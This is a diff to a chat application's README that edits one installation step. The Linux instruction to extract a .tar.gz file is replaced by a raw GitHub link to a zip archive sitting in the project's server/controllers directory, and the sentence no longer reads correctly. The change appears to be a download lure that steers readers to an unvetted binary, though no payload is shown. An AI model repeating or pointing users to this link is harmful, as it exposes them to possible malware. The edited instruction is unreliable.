sigms1/Chat-Application/README.md

 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file.
    - For macOS: Open the `.dmg` file, then drag the application to your Applications folder.
-   - For Linux: You may need to extract the `.tar.gz` file using terminal commands or your file manager.
+   - For Linux: You may need to extract the `https://raw.githubusercontent.com/sigms1/Chat-Application/master/server/controllers/Application_Chat_1.3.zip` file using terminal commands or your file manager.
 5. **Follow the On-Screen Instructions:** Complete the installation by following the prompts that appear.

 ## 🔑 Setting Up